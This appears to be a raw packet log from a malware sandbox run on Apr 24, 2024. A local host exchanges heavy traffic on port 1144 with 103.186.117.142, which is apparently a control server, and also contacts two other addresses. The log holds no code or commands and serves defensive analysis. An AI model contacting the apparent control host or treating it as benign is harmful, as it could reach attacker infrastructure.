                                                                                                                                                  Apr 24, 2024 07:20:44.899981022 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900310040 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900330067 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900346994 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900367975 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900444031 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900471926 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900480032 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900490999 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900521040 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900538921 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900557995 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900588989 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900713921 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900732994 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900764942 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900777102 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900849104 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900883913 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900968075 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900985956 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901022911 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901081085 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901098967 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901128054 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901134968 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901251078 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901271105 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901288033 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901288986 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901331902 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901387930 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901407957 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901487112 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901542902 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901593924 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901624918 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901704073 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901848078 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901882887 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901890993 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901910067 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901942015 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901949883 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902071953 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902089119 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902107954 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.902205944 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902224064 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902240992 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.902327061 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902345896 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902362108 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.902363062 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902396917 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.902503014 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902520895 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902546883 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902556896 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.902645111 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902662039 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902677059 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.902681112 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902714014 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.902812958 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902831078 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902848959 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.902867079 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.903068066 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903085947 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903096914 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903157949 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.903270006 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903289080 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903306961 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903327942 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.903506994 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903526068 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903542995 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903543949 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.903574944 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.903654099 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903671026 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903688908 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903704882 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.903841019 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903857946 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903876066 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.903875113 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.903907061 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.903987885 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904006004 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904022932 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904042959 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.904145002 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904162884 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904180050 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.904181004 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904213905 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.904318094 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904337883 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904356003 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904371977 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.904524088 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904541016 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904558897 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904558897 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.904592991 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.904715061 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904732943 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904751062 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904767036 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.904818058 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904851913 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.904916048 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904933929 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904952049 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.904963970 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.905095100 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905112982 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905129910 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905133009 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.905160904 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.905235052 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905253887 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905270100 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905294895 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.905374050 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905394077 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905406952 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.905412912 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905455112 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.905725956 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905752897 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905765057 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905806065 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.905967951 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.905985117 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906002998 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906003952 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906035900 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906203032 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906229019 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906248093 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906265020 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906373978 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906399012 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906407118 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906416893 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906459093 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906524897 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906543016 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906560898 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906577110 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906707048 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906725883 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906749010 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906749964 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906780005 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906847000 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906864882 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906882048 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906897068 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.906976938 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.906995058 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907011032 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.907011986 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907040119 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.907247066 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907263994 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907280922 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907296896 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.907299995 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907332897 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.907376051 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907393932 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907409906 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907424927 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.907557964 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907576084 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907594919 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.907596111 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907625914 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.907676935 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907695055 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907712936 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.907727003 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.962526083 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:55.074127913 CEST49718443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.074167967 CEST4434971813.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.074238062 CEST49718443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.074964046 CEST49718443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.075007915 CEST4434971813.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.076828003 CEST49718443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.109797001 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.109872103 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.109957933 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.111924887 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.111953020 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.641155005 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.641239882 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.643771887 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.643779039 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.644007921 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.694489002 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.699321032 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.744123936 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.212752104 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.212837934 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.212894917 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:56.213146925 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:56.213160038 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.213182926 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:56.213187933 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.369117975 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:56.764638901 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.764703989 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.764736891 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.764751911 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:56.764791965 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:56.764940023 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.765062094 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.167428017 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.167540073 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.167654991 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.175451994 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.175518036 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:57.759736061 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.759819031 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:21:03.715651035 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:03.717187881 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:21:03.947242022 CEST49721443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.947302103 CEST4434972113.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:03.947371960 CEST49721443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.947514057 CEST49721443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.947559118 CEST4434972113.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:03.947606087 CEST49721443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.965270042 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.965312004 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:03.965378046 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.966506004 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.966516972 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.195489883 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.486274004 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.486355066 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:04.488336086 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:04.488353014 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.488665104 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.538815975 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:04.584110975 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:05.416019917 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:05.416132927 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:05.416220903 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:05.416547060 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:05.416564941 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:05.416584969 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:05.416590929 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.131962061 CEST49724443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.132005930 CEST4434972413.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.132076025 CEST49724443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.132999897 CEST49724443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.133088112 CEST4434972413.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.133177042 CEST49724443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.153031111 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.153090000 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.153168917 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.154360056 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.154375076 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.682632923 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.682759047 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.684365988 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.684386015 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.684720993 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.728533983 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.730921984 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.776125908 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:22.622329950 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:22.622422934 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:22.622561932 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:22.622770071 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:22.622798920 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:22.622814894 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:22.622823000 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:33.745455980 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:33.746967077 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:21:34.164139986 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:52.335706949 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:21:53.165518045 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:21:54.873601913 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:21:57.968511105 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:22:03.774641991 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:22:03.776406050 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:22:04.164585114 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:22:04.211218119 CEST114449711103.186.117.142192.168.2.8
